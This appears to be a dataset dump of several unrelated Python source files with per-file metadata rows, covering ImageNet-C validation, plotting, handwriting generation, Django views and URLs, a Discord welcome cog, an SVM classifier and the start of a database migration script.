                      'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
                          i, len(val_loader), batch_time=batch_time, loss=losses,
                          top1=top1, top5=top5))
                sys.stdout.flush()
    print(' PGD Final Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
          .format(top1=top1, top5=top5))
    return top1.avg
def validate(val_loader, model, criterion, configs, logger):
    """Evaluate `model` on clean (unperturbed) validation data.

    Returns the average top-1 accuracy over `val_loader`.
    NOTE(review): `logger` is unused here; progress is printed to stdout.
    """
    # Mean/Std for normalization
    mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
    mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
    std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
    std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
    # Initiate the meters
    batch_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    top5 = AverageMeter()
    # switch to evaluate mode
    model.eval()
    end = time.time()
    for i, (input, target) in enumerate(val_loader):
        with torch.no_grad():
            input = input.cuda(non_blocking=True)
            target = target.cuda(non_blocking=True)
            # compute output (inputs are normalized in-place here)
            input = input - mean
            input.div_(std)
            output = model(input)
            loss = criterion(output, target)
            # measure accuracy and record loss
            prec1, prec5 = accuracy(output, target, topk=(1, 5))
            losses.update(loss.item(), input.size(0))
            top1.update(prec1[0], input.size(0))
            top5.update(prec5[0], input.size(0))
            # measure elapsed time
            batch_time.update(time.time() - end)
            end = time.time()
            if i % configs.TRAIN.print_freq == 0:
                print('Test: [{0}/{1}]\t'
                      'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                      'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                      'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
                      'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
                          i, len(val_loader), batch_time=batch_time, loss=losses,
                          top1=top1, top5=top5))
                sys.stdout.flush()
    print(' Final Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
          .format(top1=top1, top5=top5))
    return top1.avg
def validate_ImagetNet_C(val_loader_name, model, criterion, configs, logger):
    """Evaluate `model` on one ImageNet-C corruption type.

    `val_loader_name` names the corruption folder under `configs.data`,
    which contains severity sub-folders '1'..'5'.  Top-1 accuracy is
    computed per severity; the mean over the five severities is printed.
    NOTE(review): `criterion` and `logger` are unused and nothing is
    returned; the function name also misspells "ImageNet".
    """
    # Mean/Std for normalization
    mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
    mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
    std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
    std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
    # switch to evaluate mode
    model.eval()
    # One sub-folder per corruption severity level.
    fil_index = ['/1','/2','/3','/4','/5']
    avg_return = 0
    for f in fil_index:
        valdir = os.path.join(configs.data, val_loader_name+f)
        print(' File: ', valdir)
        val_loader = torch.utils.data.DataLoader(
            datasets.ImageFolder(valdir, transforms.Compose([
                transforms.Resize(configs.DATA.img_size),
                transforms.CenterCrop(configs.DATA.crop_size),
                transforms.ToTensor(),
            ])),
            batch_size=configs.DATA.batch_size, shuffle=False,
            num_workers=configs.DATA.workers, pin_memory=True)
        # Initiate the meters
        top1 = AverageMeter()
        end = time.time()
        for i, (input, target) in enumerate(val_loader):
            with torch.no_grad():
                input = input.cuda(non_blocking=True)
                target = target.cuda(non_blocking=True)
                # compute output (inputs are normalized in-place here)
                input = input - mean
                input.div_(std)
                output = model(input)
                # measure accuracy and record loss
                prec1,_ = accuracy(output, target, topk=(1,2))
                top1.update(prec1[0], input.size(0))
                # if i % configs.TRAIN.print_freq == 0:
                #     print('PGD Test: [{0}/{1}]\t'
                #           'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
                #               i, len(val_loader),top1=top1))
                #     print('Time: ', time.time() - end)
                #     sys.stdout.flush()
        print('Prec: ',top1.avg.cpu().item())
        avg_return += top1.avg.cpu().item()
    print('Avergae Classification Accuracy is: ', avg_return / 5.)
    return
| 37.491228 | 167 | 0.565746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,464 | 0.171268 |
d515e1181cd1a83ccea9dcf3b0c0c3bdba283864 | 2,493 | py | Python | scripts/merge.py | vsui/hypergraph-k-cut | 1134ca254fb709bce62a4506c931362d84a06894 | [
"MIT"
] | 2 | 2021-01-17T07:31:36.000Z | 2021-07-14T08:36:50.000Z | scripts/merge.py | vsui/hypergraph-k-cut | 1134ca254fb709bce62a4506c931362d84a06894 | [
"MIT"
] | null | null | null | scripts/merge.py | vsui/hypergraph-k-cut | 1134ca254fb709bce62a4506c931362d84a06894 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""This is a script for making graphs of constant rank instances with varying rank
Usage:
<script> <src_dir> <dest_dir>
Where <src_dir> is a directory with subfolders
```
constant02
constant04
...
```
And each subfolder has a file `data.csv` with the CXY run in it.
This combines the graphs of differents ranks on the same plot
Outputs a graph in a file named 'output.pdf'
"""
import matplotlib.pyplot as plt
import os
import sqlite3
import sys
def get_series_from_folder2(path):
    """Get a list of (size, avg time_elapsed_ms) tuples from the sqlite3
    file 'data.db' inside `path`, averaged per hypergraph and ordered by
    hypergraph size.

    This assumes that all runs stored in the database are CXY runs.
    """
    conn = sqlite3.connect(os.path.join(path, 'data.db'))
    try:
        c = conn.cursor()
        c.execute('''
            SELECT hypergraphs.size, avg(time_elapsed_ms) AS time FROM
            runs JOIN hypergraphs ON hypergraphs.id = runs.hypergraph_id
            GROUP BY runs.hypergraph_id
            ORDER BY hypergraphs.size
            ''')
        return c.fetchall()
    finally:
        # Bug fix: the connection was previously never closed.
        conn.close()
# exit()
def get_series_from_folder(path):
    """Get list of (size, cxy_time) tuples from a folder's 'data.csv'."""
    csv_path = os.path.join(path, 'data.csv')
    return get_series_from_file(csv_path)
def get_series_from_file(path):
    """Get list of (size, cxy_time) tuples from a CSV file.

    Column 1 holds the hypergraph size and column 3 the CXY time; the
    header row is skipped.
    """
    series = []
    with open(path) as handle:
        handle.readline()  # discard the header row
        for raw in handle:
            fields = raw.strip().split(',')
            series.append((float(fields[1]), float(fields[3])))
    return series
def unzip(l):
    """Unzips a list of tuples into a tuple of two lists.

    e.g. [(1, 2), (3, 4)] -> ([1, 3], [2, 4])
    """
    firsts = [pair[0] for pair in l]
    seconds = [pair[1] for pair in l]
    return firsts, seconds
# plt.title(f'Discovery time of CXY on planted instances with different ranks, {os.path.basename(sys.argv[1])}')
# Collect the rank sub-folders ("constant02", "constant04", ...) under src_dir.
folders = [os.path.join(sys.argv[1], folder) for folder in os.listdir(
    sys.argv[1]) if folder.startswith('constant')]
plt.xlabel('Hypergraph size')
plt.ylabel('Discovery time (ms)')
min_x, max_x = None, None
# Sort by rank: the folder name ends in a two-digit rank ("constant02" -> 2).
folders.sort(key=lambda name: int(name[-2:]))
print(folders)
for folder in folders:
    xs, ys = unzip(get_series_from_folder2(folder))
    print(xs, ys)
    plt.plot(xs, ys, label=f'rank={int(folder[-2:])}', marker='.')
    # Track the size range common to every rank so the x-axis covers only
    # the intersection of all series (xs is ordered by size).
    min_x = xs[0] if min_x is None else max(min_x, xs[0])
    max_x = xs[-1] if max_x is None else min(max_x, xs[-1])
plt.xlim(min_x, max_x)
plt.legend()
# NOTE(review): os.path.join with a single argument is a no-op; the output
# path is simply sys.argv[2] (the module docstring says 'output.pdf').
plt.savefig(os.path.join(sys.argv[2]))
plt.close()
| 24.683168 | 112 | 0.638187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,192 | 0.478139 |
1d0fdb41642d7e059e2af9967d0a5707e8be001c | 1,829 | py | Python | StationeryBG.py | CharlesW1970/Handright | cda9400232e1815f7137ab3bd86ded8e307f35c7 | [
"BSD-3-Clause"
] | 1 | 2020-10-14T06:05:35.000Z | 2020-10-14T06:05:35.000Z | StationeryBG.py | CharlesW1970/Handright | cda9400232e1815f7137ab3bd86ded8e307f35c7 | [
"BSD-3-Clause"
] | null | null | null | StationeryBG.py | CharlesW1970/Handright | cda9400232e1815f7137ab3bd86ded8e307f35c7 | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
from PIL import Image, ImageFont
from handright import Template, handwrite
text = """
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
"""
imagex = Image.open("./pic/stationeryBackground.jpg")
width, height = imagex.size
imagex = imagex.resize((width * 2, height * 2), resample=Image.LANCZOS)
template = Template(background=imagex,
font_size=140,
font=ImageFont.truetype("./fonts/whx_2nd.ttf"),
line_spacing=220,
fill=0, # 字体“颜色”
left_margin=380,
top_margin=370,
right_margin=340,
bottom_margin=340,
word_spacing=12,
line_spacing_sigma=7, # 行间距随机扰动
font_size_sigma=3, # 字体大小随机扰动
word_spacing_sigma=6, # 字间距随机扰动
end_chars=", 。", # 防止特定字符因排版算法的自动换行而出现在行首
perturb_x_sigma=2, # 笔画横向偏移随机扰动
perturb_y_sigma=2, # 笔画纵向偏移随机扰动
perturb_theta_sigma=0.05, # 笔画旋转偏移随机扰动
)
images = handwrite(text, template)
for i, im in enumerate(images):
assert isinstance(im, Image.Image)
im.show()
im.save("./output/{}.png".format(i)) | 43.547619 | 172 | 0.783488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,901 | 0.789818 |
1d117bf0adf1a9cc2baa3df6d95a6f65e94df2bb | 4,627 | py | Python | api/metadata/views.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | api/metadata/views.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | api/metadata/views.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | from django.conf import settings
from hawkrest import HawkAuthentication
from rest_framework import generics, status
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from .constants import (
BARRIER_PENDING,
BARRIER_SOURCE,
BarrierStatus,
BARRIER_CHANCE_OF_SUCCESS,
BARRIER_INTERACTION_TYPE,
BARRIER_TERMS,
ECONOMIC_ASSESSMENT_IMPACT,
ECONOMIC_ASSESSMENT_RATING,
ESTIMATED_LOSS_RANGE,
GOVT_RESPONSE,
PUBLISH_RESPONSE,
REPORT_STATUS,
RESOLVABILITY_ASSESSMENT_EFFORT,
RESOLVABILITY_ASSESSMENT_TIME,
STAGE_STATUS,
STRATEGIC_ASSESSMENT_SCALE,
SUPPORT_TYPE,
TRADE_CATEGORIES,
TRADE_DIRECTION_CHOICES,
TRADING_BLOCS,
)
from .utils import (
get_admin_areas,
get_barrier_priorities,
get_barrier_tags,
get_barrier_type_categories,
get_categories,
get_os_regions_and_countries,
get_reporting_stages,
get_sectors,
get_wto_committee_groups, get_government_organisations,
)
class MetadataView(generics.GenericAPIView):
    """Read-only endpoint that returns every metadata lookup table the
    frontend needs (statuses, regions, sectors, tags, ...) as one payload.
    """
    if settings.HAWK_ENABLED:
        authentication_classes = (HawkAuthentication,)
        permission_classes = (IsAuthenticated,)
    else:
        authentication_classes = ()
        permission_classes = ()

    def get(self, request):
        """Assemble the metadata dictionary and return it as a 200 response."""
        overseas_regions, countries = get_os_regions_and_countries()
        # "barrier_types" is a legacy alias for "categories"; both are served.
        category_list = get_categories()
        metadata = {
            "barrier_terms": dict(BARRIER_TERMS),
            "loss_range": dict(ESTIMATED_LOSS_RANGE),
            "stage_status": dict(STAGE_STATUS),
            "govt_response": dict(GOVT_RESPONSE),
            "publish_response": dict(PUBLISH_RESPONSE),
            "report_status": dict(REPORT_STATUS),
            "report_stages": get_reporting_stages(),
            "support_type": dict(SUPPORT_TYPE),
            "barrier_types": category_list,
            "categories": category_list,
            "overseas_regions": overseas_regions,
            "countries": countries,
            "admin_areas": get_admin_areas(),
            "sectors": get_sectors(),
            "barrier_status": dict(BarrierStatus.choices),
            "barrier_pending": dict(BARRIER_PENDING),
            "barrier_tags": get_barrier_tags(),
            "barrier_type_categories": get_barrier_type_categories(),
            "barrier_chance_of_success": dict(BARRIER_CHANCE_OF_SUCCESS),
            "barrier_interaction_types": dict(BARRIER_INTERACTION_TYPE),
            "barrier_source": dict(BARRIER_SOURCE),
            "barrier_priorities": get_barrier_priorities(),
            "economic_assessment_impact": dict(ECONOMIC_ASSESSMENT_IMPACT),
            "economic_assessment_rating": dict(ECONOMIC_ASSESSMENT_RATING),
            "resolvability_assessment_effort": dict(RESOLVABILITY_ASSESSMENT_EFFORT),
            "resolvability_assessment_time": dict(RESOLVABILITY_ASSESSMENT_TIME),
            "strategic_assessment_scale": dict(STRATEGIC_ASSESSMENT_SCALE),
            "trade_categories": dict(TRADE_CATEGORIES),
            "trade_direction": {str(code): label for code, label in TRADE_DIRECTION_CHOICES},
            "trading_blocs": TRADING_BLOCS.values(),
            "wto_committee_groups": get_wto_committee_groups(),
            "government_organisations": get_government_organisations(),
        }
        return Response(metadata, status=status.HTTP_200_OK)
| 37.92623 | 79 | 0.706938 | 3,593 | 0.776529 | 0 | 0 | 0 | 0 | 0 | 0 | 604 | 0.130538 |
1d14d1a8f4768aa5af1d7409da82dc30b96fd135 | 367 | py | Python | test_memory.py | dbstein/python_examples | 664142b5f8e5f58c04f1d588bc6659221dc6b0a9 | [
"Apache-2.0"
] | null | null | null | test_memory.py | dbstein/python_examples | 664142b5f8e5f58c04f1d588bc6659221dc6b0a9 | [
"Apache-2.0"
] | null | null | null | test_memory.py | dbstein/python_examples | 664142b5f8e5f58c04f1d588bc6659221dc6b0a9 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from numexpr_kernel import numexpr_kernel
from numba_kernel import numba_kernel
N = 10000
# Random input arrays of length N.
x = np.random.rand(N)
y = np.random.rand(N)
z = np.random.rand(N)
tau = np.random.rand(N)
# Each kernel is called twice on purpose; presumably the first call pays a
# one-time compilation/caching cost (e.g. numba JIT) -- TODO confirm intent.
r1 = numexpr_kernel(x, y, z, tau)
r1 = numexpr_kernel(x, y, z, tau)
r2 = np.zeros(N, dtype=float)
numba_kernel(x, y, z, tau, r2, N)
numba_kernel(x, y, z, tau, r2, N)
| 22.9375 | 41 | 0.700272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1d168df70c241bffc650db1634940f97996ff8f9 | 151 | py | Python | 8kyu/grasshopper_combine_strings.py | nhsz/codewars | 82703959e910254d6feff4162f78c6dbd7a1c3ed | [
"MIT"
] | 1 | 2018-12-02T23:04:38.000Z | 2018-12-02T23:04:38.000Z | 8kyu/grasshopper_combine_strings.py | nhsz/codewars | 82703959e910254d6feff4162f78c6dbd7a1c3ed | [
"MIT"
] | null | null | null | 8kyu/grasshopper_combine_strings.py | nhsz/codewars | 82703959e910254d6feff4162f78c6dbd7a1c3ed | [
"MIT"
] | null | null | null | # http://www.codewars.com/kata/55f73f66d160f1f1db000059/
def combine_names(first_name, last_name):
    """Return the full name: first and last joined by a single space."""
    return "%s %s" % (first_name, last_name)
| 30.2 | 56 | 0.754967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.430464 |
1d17af49d97762d297a5faa5d4a099f944bdc291 | 1,125 | py | Python | PG/project/myapp/urls.py | vishalimpinge7696/vishal_pg | c881b8d6d784b764700d2068226cb725c16f9490 | [
"Apache-2.0"
] | null | null | null | PG/project/myapp/urls.py | vishalimpinge7696/vishal_pg | c881b8d6d784b764700d2068226cb725c16f9490 | [
"Apache-2.0"
] | null | null | null | PG/project/myapp/urls.py | vishalimpinge7696/vishal_pg | c881b8d6d784b764700d2068226cb725c16f9490 | [
"Apache-2.0"
] | null | null | null | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from . import views
# URL routes for the app: authentication (signup/signin/logout) plus the
# site's content pages; each route maps to a view of the same name.
urlpatterns = [
    path('', views.home, name='home'),
    path('signup',views.signup, name='signup'),
    path('signin',views.signin, name='signin'),
    path('logout',views.logout,name='logout'),
    path('property', views.property, name='property'),
    path('agents', views.agents, name='agents'),
    path('news', views.news, name='news'),
    path('pages', views.pages, name='pages'),
    path('contact', views.contact, name='contact')
]
| 37.5 | 77 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 766 | 0.680889 |
1d1827406da3b2f551eb53c92ceb578ffb31e0ff | 3,425 | py | Python | full_test_data_svm_rbf.py | HarikrishnanNB/occd_experiments | e078030348133a564400a5b27057400c69ddfd92 | [
"Apache-2.0"
] | null | null | null | full_test_data_svm_rbf.py | HarikrishnanNB/occd_experiments | e078030348133a564400a5b27057400c69ddfd92 | [
"Apache-2.0"
] | null | null | null | full_test_data_svm_rbf.py | HarikrishnanNB/occd_experiments | e078030348133a564400a5b27057400c69ddfd92 | [
"Apache-2.0"
] | 1 | 2021-02-14T06:14:47.000Z | 2021-02-14T06:14:47.000Z | """
This module give the classification results for test data using SVM with RBF
kernel.
Email: harikrishnannb07@gmail.com
Dtd: 2 - August - 2020
Parameters
----------
classification_type : string
DESCRIPTION - classification_type == "binary_class" loads binary classification artificial data.
classification_type == "multi_class" loads multiclass artificial data
folder_name : string
DESCRIPTION - the name of the folder to store results. For eg., if
folder_name = "hnb", then this function will create two folder "hnb-svm"
and "hnb-svm_rbf" to save the classification report.
target_names : array, 1D, string
DESCRIPTION - if there are two classes, then target_names = ['class-0', class-1]
Note- At the present version of the code, the results for binary classification
and five class classification will be saved.
Returns : None
-------
Computes the accuracy_svm_rbf, fscore_svm_rbf
"""
import os
import numpy as np
from sklearn.metrics import f1_score, accuracy_score
from sklearn import svm
from sklearn.metrics import confusion_matrix as cm
from sklearn.metrics import classification_report
from load_data_synthetic import get_data
#from Codes import classification_report_csv_
# Experiment configuration: which synthetic dataset to load and where the
# results are written.
classification_type = "concentric_circle_noise"
folder_name = "full-testdata"
target_names = ['class-0', 'class-1']
path = os.getcwd()
result_path_svm_rbf = path + '/NEUROCHAOS-RESULTS/' + classification_type + '/' + folder_name +'-svm_rbf/'
# Creating Folder to save the results
try:
    os.makedirs(result_path_svm_rbf)
except OSError:
    print("Creation of the result directory %s failed" % result_path_svm_rbf)
else:
    print("Successfully created the result directory %s" % result_path_svm_rbf)
# Load the synthetic train/test split for the chosen classification task.
full_artificial_data, full_artificial_label, full_artificial_test_data, full_artificial_test_label = get_data(classification_type)
num_classes = len(np.unique(full_artificial_label)) # Number of classes
# NOTE(review): the message says "Genome data" but this script loads
# synthetic (artificial) data -- likely copied from another experiment.
print("**** Genome data details ******")
for class_label in range(np.max(full_artificial_label)+1):
    print("Total Data instance in Class -", class_label, " = ", full_artificial_label.tolist().count([class_label]))
print(" train data = ", (full_artificial_data.shape[0]))
print("val data = ", (full_artificial_test_data.shape[0]))
# Start of svm_rbf classifier
svm_rbf_classifier = svm.SVC(kernel='rbf', gamma='scale')
svm_rbf_classifier.fit(full_artificial_data, full_artificial_label[:, 0])
predicted_svm_rbf_val_label = svm_rbf_classifier.predict(full_artificial_test_data)
# Accuracy (percent, currently only computed -- not printed or saved) and
# macro F1 on the full held-out test data.
acc_svm_rbf = accuracy_score(full_artificial_test_label, predicted_svm_rbf_val_label)*100
f1score_svm_rbf = f1_score(full_artificial_test_label, predicted_svm_rbf_val_label, average="macro")
report_svm_rbf = classification_report(full_artificial_test_label, predicted_svm_rbf_val_label, target_names=target_names)
# Saving the classification report to csv file for svm_rbf classifier.
print(report_svm_rbf)
#classification_report_csv_(report_svm_rbf, num_classes).to_csv(result_path_svm_rbf+'svm_rbf_report_'+ str(iterations) +'.csv', index=False)
confusion_matrix_svm_rbf = cm(full_artificial_test_label, predicted_svm_rbf_val_label)
print("Confusion matrixfor svm_rbf\n", confusion_matrix_svm_rbf)
# End of svm_rbf classifier.
# saving the f1-score
np.save(result_path_svm_rbf + 'f1score.npy', f1score_svm_rbf)
| 40.77381 | 141 | 0.771095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,692 | 0.494015 |
1d190a8611651be6c78a5e9a052e5a0ee7efbe5c | 2,115 | py | Python | sci_analysis/preferences/preferences.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | [
"MIT"
] | 17 | 2017-05-10T18:25:36.000Z | 2021-12-23T14:43:49.000Z | sci_analysis/preferences/preferences.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | [
"MIT"
] | 57 | 2016-08-22T23:58:05.000Z | 2019-07-31T06:54:22.000Z | sci_analysis/preferences/preferences.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | [
"MIT"
] | null | null | null |
class DefaultPreferences(type):
    """Metaclass that makes a class's ``defaults`` attribute immutable.

    Rebinding or deleting ``defaults`` on a class built with this
    metaclass raises :class:`AttributeError`; every other class
    attribute behaves normally.
    """
    def __setattr__(cls, key, value):
        if key == "defaults":
            raise AttributeError("Cannot override defaults")
        return super().__setattr__(key, value)
    def __delattr__(cls, item):
        if item == "defaults":
            raise AttributeError("Cannot delete defaults")
        return super().__delattr__(item)
class Preferences(object):
    """Base class for preference containers.

    NOTE(review): ``__metaclass__`` is the Python 2 metaclass hook; under
    Python 3 it is just an ordinary class attribute with no effect —
    confirm which interpreter this project targets.
    """
    __metaclass__ = DefaultPreferences
    def list(self):
        """Print the instance's preference dict and return it."""
        prefs = self.__dict__
        print(prefs)
        return prefs
    def defaults(self):
        """Return all current preference values as a tuple."""
        return tuple(self.__dict__.values())
class GraphPreferences(object):
    """Handles graphing preferences.

    Everything here is class-level state: the nested ``Plot`` class holds
    on/off switches for each plot type, while ``distribution``,
    ``bivariate`` and ``oneway`` hold per-graph styling defaults.
    """
    class Plot(object):
        # Which plot types are rendered by default.
        boxplot = True
        histogram = True
        cdf = False
        oneway = True
        probplot = True
        scatter = True
        tukey = False
        histogram_borders = False
        boxplot_borders = False
        # Snapshot of the flags above, in declaration order.
        defaults = (boxplot, histogram, cdf, oneway, probplot, scatter, tukey, histogram_borders, boxplot_borders)
    # Styling defaults for single-variable distribution graphs.
    # Style strings ('r--', 'k-', ...) follow matplotlib's format codes.
    distribution = {'counts': False,
                    'violin': False,
                    'boxplot': True,
                    'fit': False,
                    'fit_style': 'r--',
                    'fit_width': '2',
                    'cdf_style': 'k-',
                    'distribution': 'norm',
                    'bins': 20,
                    'color': 'green'
                    }
    # Styling defaults for bivariate (x/y) graphs.
    bivariate = {'points': True,
                 'point_style': 'k.',
                 'contours': False,
                 'contour_width': 1.25,
                 'fit': True,
                 'fit_style': 'r-',
                 'fit_width': 1,
                 'boxplot': True,
                 'violin': True,
                 'bins': 20,
                 'color': 'green'
                 }
    # Styling defaults for one-way (grouped comparison) graphs.
    oneway = {'boxplot': True,
              'violin': False,
              'point_style': '^',
              'line_style': '-'
              }
| 27.467532 | 114 | 0.48227 | 2,106 | 0.995745 | 0 | 0 | 0 | 0 | 0 | 0 | 480 | 0.22695 |
1d1ad6315c73b6924e164f03e7e42156df8826eb | 1,224 | py | Python | cogs/WelcomeCog.py | tandemdude/DevilDonkey | be2c561f73c42aa2d5016e186bef2538658475d5 | [
"MIT"
] | 1 | 2021-08-22T17:34:41.000Z | 2021-08-22T17:34:41.000Z | cogs/WelcomeCog.py | tandemdude/DevilDonkey | be2c561f73c42aa2d5016e186bef2538658475d5 | [
"MIT"
] | null | null | null | cogs/WelcomeCog.py | tandemdude/DevilDonkey | be2c561f73c42aa2d5016e186bef2538658475d5 | [
"MIT"
] | null | null | null | # User welcome extension coded by github u/tandemdude
# https://github.com/tandemdude
import discord
import json
from discord.ext import commands
class Welcome(commands.Cog):
    """Announces members joining and leaving the server.

    The announcement channel id is re-read from ``config.json`` on every
    event, so configuration changes take effect without a restart.
    A channel id of 0 disables announcements entirely.
    """
    # Accent color shared by the join and leave embeds.
    EMBED_COLOR = 0xde2bea
    def __init__(self, bot):
        self.bot = bot
    @staticmethod
    def _welcome_channel_id():
        """Return the configured welcome channel id (0 means disabled)."""
        with open('config.json') as json_file:
            config = json.load(json_file)
        return config['welcome_ch']
    async def _announce(self, title, author_name, member):
        """Send a titled embed about *member* to the welcome channel, if any."""
        welcome_channel_id = self._welcome_channel_id()
        if welcome_channel_id != 0:
            a = discord.Embed(title=title, color=self.EMBED_COLOR)
            a.set_author(name=author_name, icon_url=member.avatar_url)
            welcome_channel = self.bot.get_channel(welcome_channel_id)
            await welcome_channel.send(embed=a)
    @commands.Cog.listener()
    async def on_member_join(self, member):
        """Greet a newly joined member."""
        await self._announce('Welcome!', f'{member.display_name} Has joined the server!', member)
    @commands.Cog.listener()
    async def on_member_remove(self, member):
        """Say goodbye to a departing member."""
        await self._announce('See you again soon!', f'{member.display_name} Has left the server 😢', member)
def setup(bot):
    """discord.py extension entry point: register the Welcome cog."""
    bot.add_cog(Welcome(bot))
| 29.142857 | 97 | 0.747549 | 1,033 | 0.841891 | 0 | 0 | 955 | 0.778321 | 903 | 0.735941 | 261 | 0.212714 |
1d1b331ff1ab098a4c5dbc7bd53b72d465dadc1d | 293 | py | Python | configurations.py | KumundzhievMaxim/WearingGlassesClassification | ae78a258735e852a1fbb9d9d9876f9ea74320153 | [
"MIT"
] | 1 | 2021-06-05T13:10:07.000Z | 2021-06-05T13:10:07.000Z | configurations.py | KumundzhievMaxim/WearingGlassesClassification | ae78a258735e852a1fbb9d9d9876f9ea74320153 | [
"MIT"
] | null | null | null | configurations.py | KumundzhievMaxim/WearingGlassesClassification | ae78a258735e852a1fbb9d9d9876f9ea74320153 | [
"MIT"
] | null | null | null | # ------------------------------------------
#
# Program created by Maksim Kumundzhiev
#
#
# email: kumundzhievmaxim@gmail.com
# github: https://github.com/KumundzhievMaxim
# -------------------------------------------
# Number of samples per training batch.
BATCH_SIZE = 10
# Images are resized to this (width, height) before being fed to the model.
IMG_SIZE = (160, 160)
# Path where model checkpoints are written/read.
MODEL_PATH = 'checkpoints/model'
| 20.928571 | 45 | 0.511945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.788396 |
1d1cbe4a45b8515cd47580925c5d9d6956f0f60a | 10,247 | py | Python | conditional/models/migrate.py | adamhb123/conditional | 7193443106f83e8260b61535b6d6a253f01133f8 | [
"MIT"
] | 2 | 2020-06-27T09:11:59.000Z | 2020-12-27T17:49:50.000Z | conditional/models/migrate.py | adamhb123/conditional | 7193443106f83e8260b61535b6d6a253f01133f8 | [
"MIT"
] | null | null | null | conditional/models/migrate.py | adamhb123/conditional | 7193443106f83e8260b61535b6d6a253f01133f8 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from conditional import db
from conditional.models import models, old_models as zoo
import flask_migrate
# pylint: skip-file
old_engine = None
zoo_session = None
# Takes in param of SqlAlchemy Database Connection String
def free_the_zoo(zoo_url):
confirm = str(input('Are you sure you want to clear and re-migrate the database? (y/N): ')).strip()
if confirm == 'y':
init_zoo_db(zoo_url)
if flask_migrate.current() is not None:
flask_migrate.downgrade(tag='base')
flask_migrate.upgrade()
migrate_models()
# Connect to Zookeeper
def init_zoo_db(database_url):
    """Open a connection to the legacy Zookeeper database.

    Populates the module-level ``old_engine`` and ``zoo_session`` used by
    migrate_models(), and creates the legacy table metadata if missing.
    """
